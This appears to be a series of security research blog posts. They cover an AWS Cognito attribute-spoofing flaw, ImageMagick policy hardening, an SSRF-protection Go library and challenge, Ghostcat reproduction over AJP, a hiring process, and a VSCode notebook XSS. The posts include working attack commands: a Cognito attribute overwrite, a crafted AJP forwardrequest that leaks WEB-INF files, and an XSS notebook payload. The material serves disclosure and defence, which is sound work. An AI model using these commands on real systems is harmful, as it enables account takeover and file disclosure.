User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

  • Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
  • Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both cases, the end user receives the resulting JSON Web Token (JWT).
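
As an example of the client-side flow, tokens can be obtained with the app client ID alone via the AWS CLI, assuming the USER_PASSWORD_AUTH flow is enabled for the app client (identifiers below are placeholders):

$ aws cognito-idp initiate-auth \
    --region us-east-1 \
    --auth-flow USER_PASSWORD_AUTH \
    --client-id <APP_CLIENT_ID> \
    --auth-parameters USERNAME=<username>,PASSWORD=<password>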

After that first look at Cognito’s core concepts, we can jump straight into the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use. The decoded Cognito access token (JWT) issued for a user session looked like the following:

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user access tokens permit calls to all the User Pool API operations that can be invoked with an access token alone.

The permitted API definitions can be found here.

If the request syntax for an API operation includes the parameter "AccessToken": "string", then it allows users to modify something on their own User Pool entry with the previously inspected JWT.

The design described above does not represent a vulnerability on its own, but allowing users to edit their own User Attributes in the pool could lead to severe impacts if the backend uses them to apply internal platform logic.

The user’s associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1 --access-token eyJra..[REDACTED SESSION JWT]
{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

  • Which User Attributes are associated with the user pool?
  • Which ones are editable with the JWT directly via AWS CLI?
    • Among the editable ones, is the platform trusting such claims?
      • For what internal logic or functional flow?
      • How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within the App Integrations for the User Pool in use (AWS Cognito).

By removing them, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.
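
For instance, a hypothetical admin-side update of the attribute discussed earlier would look like this (identifiers are placeholders):

$ aws cognito-idp admin-update-user-attributes \
    --user-pool-id us-east-1_EXAMPLE \
    --username <username> \
    --user-attributes Name=custom:X_platform_user_id,Value=<verified-id>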

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the β€œemail” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please ensure to properly handle email and phone number verification in the Cognito context. Since these attributes may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!


ImageMagick Security Policy Evaluator

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo-culted from around the internet. This normally happens for two reasons:

  • Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy regulates. While the architectural complexity and the granularity of the options definable in the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by developers depending on their use case. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available; however, as noted in the past, it is not always well configured.
  • ImageMagick supports over 100 major file formats (not including sub-formats). The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both developers and security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may miss subtle bypasses that undermine the strength of a policy. It’s also easy to set policies that appear to work but offer no real security benefit. The tool’s checks are based on our research, aimed at helping developers harden their policies and improve the security of their applications, making sure policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed its behavior from disallowing the use of a coder if there was at least one none-permission rule in the policy, to respecting the last matching rule in the policy for the coder. This means that it is possible to adopt an allowlist approach in modern policies: first deny rights to all coders, then enable the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case-sensitive. Coders and modules must always be upper-case in the policy (e.g., “EPS” not “eps”).
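
The same denylist becomes effective once the patterns are upper-cased, reusing the brace syntax shown earlier:

  ...
  <policy domain="coder" rights="none" pattern="{EPHEMERAL,EPI,EPS,MSL,MVG,PDF,PLT,PS,PS2,PS3,SHOW,TEXT,WIN,XPS}" />
  ...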

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads, it’s convenient to search for “oom” or similar keywords in the recently opened issues reported on the GitHub repository of the library. This is an issue, since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to exploitation. Because of this, the tool also reports when reasonable limits are not explicitly set by the policy.

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.
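
For example, comparable limits can be applied per-invocation or process-wide (values are illustrative):

$ convert -limit memory 256MiB -limit time 10 input.png output.png
$ MAGICK_MEMORY_LIMIT=256MiB MAGICK_TIME_LIMIT=10 convert input.png output.png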

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap xmlns="">
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy xmlns="" domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

safeurl for Go

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF in numerous programming languages exist, Go didn’t have an easy to use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does safeurl Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via the safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

import (
    "fmt"
    "github.com/doyensec/safeurl"
)

func main() {
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        fmt.Errorf("request return error: %v", err)
    }

    // read response body
}

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

  • allowed traffic only for ports 80 and 443
  • allowed traffic which uses HTTP or HTTPS protocols
  • blocked traffic to private IP addresses
  • blocked IPv6 traffic to any address
  • mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemes the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR ranges the application is allowed to connect to
BlockedCIDR             - list of CIDR ranges the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure other standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single schema:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// Incorrect. This configuration will allow traffic only to the last allowed port (443), overwriting any that were set before
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the IP points to an allowed destination. However, at the time-of-use (TOU), it will point to a completely different IP address.
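
To make the issue concrete, here is a minimal Go sketch of the vulnerable pattern safeurl is designed to prevent (the isPrivate helper and the hostname are hypothetical): validating the resolved IP separately from the actual connection leaves a window for the DNS answer to change:

package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
)

// isPrivate is a hypothetical validator, used only for illustration.
func isPrivate(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate()
}

// fetchNaive resolves the hostname twice: once for validation (time-of-check)
// and again inside http.Get (time-of-use). A malicious DNS server can answer
// with a harmless IP first, and with 127.0.0.1 on the second resolution.
func fetchNaive(host string) (*http.Response, error) {
	ips, err := net.LookupIP(host) // time-of-check resolution
	if err != nil || len(ips) == 0 || isPrivate(ips[0]) {
		return nil, errors.New("blocked")
	}
	return http.Get("http://" + host) // time-of-use: resolved again internally
}

func main() {
	if _, err := fetchNaive("rebinding.attacker.example"); err != nil {
		fmt.Println(err)
	}
}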

DNS rebinding protection in safeurl is accomplished by performing the allowlist/blocklist validations on the actual IP address that will be used to make the HTTP request. This is achieved by utilizing Go’s net.Dialer and its Control hook. As stated in the official documentation:

// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IP validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. In case a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {
	return func(network, address string, _ syscall.RawConn) error {
		// [...]
		if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
			wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
			return &AllowedIPError{ip: ip.String()}
		}

		if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
			wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
			return &AllowedIPError{ip: ip.String()}
		}

		return nil
	}
}

Help Us Make safeurl Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

“Given enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}


If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancement ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

Let's speak AJP

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol, especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to efficiently manage network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below:

[AJP schema]

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and at potentially discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer, a rudimentary fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz arbitrary elements within the packet.

With minor tuning, AJPFuzzer can also be used to quickly reproduce the Ghostcat vulnerability. In fact, we successfully reproduced the attack by sending a crafted forwardrequest message including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the disclosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

[AJP message structure, as dissected in Wireshark]

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. With this command, it’s possible to fuzz arbitrary elements within the AJP request, such as the request attribute names/values, secret, cookie names/values, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt


Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret (see the sketch after this list)
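
A minimal sketch of such a hardened AJP connector in Tomcat’s server.xml (attribute names per recent Tomcat versions; the secret value is a placeholder):

<Connector protocol="AJP/1.3" address="127.0.0.1" port="8009"
           secretRequired="true" secret="use-a-long-random-value" />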

Recruiting Security Researchers Remotely

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.


We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures and, on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process with a given candidate, we want to get to know them better. We want to understand their motivations for changing workplaces as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know a candidate before asking them to demonstrate their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance which programming languages appear in our tests, but candidates should expect the more popular ones. We don't test on niche languages, as our goal is to check whether candidates are able to find vulnerabilities in real-world code, not to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, the academic knowledge necessary to pass our code review challenge can be found in most standard application security resources.

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview lasts about 45 minutes, during which we ask questions that help us understand the candidate's skillset and determine their level of seniority. During this conversation, we also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there, or perhaps why someone missed a particular, easy-to-detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from standard application security sources.

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed-upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities, and the candidate's task is to find as many of them as possible and prepare a simplified report. Unlike the previous technical challenge, where we checked the ability to read source code, this is a 100% blackbox test.

We recommend that candidates feel comfortable with topics similar to those covered in the PortSwigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior to attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn't so much an interview as a summary of the entire process. We want to talk to the candidate about their strengths, and better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that stem from a lack of knowledge from those that result from time pressure. It's a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, only one working day in total. So, if the candidate is responsive, the entire process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Visual Studio Code Jupyter Notebook RCE

I set aside a few hours over the past weekend to look into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug, discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files. The following minimal notebook file demonstrates the issue:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server; however, it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation avenues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Aided by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

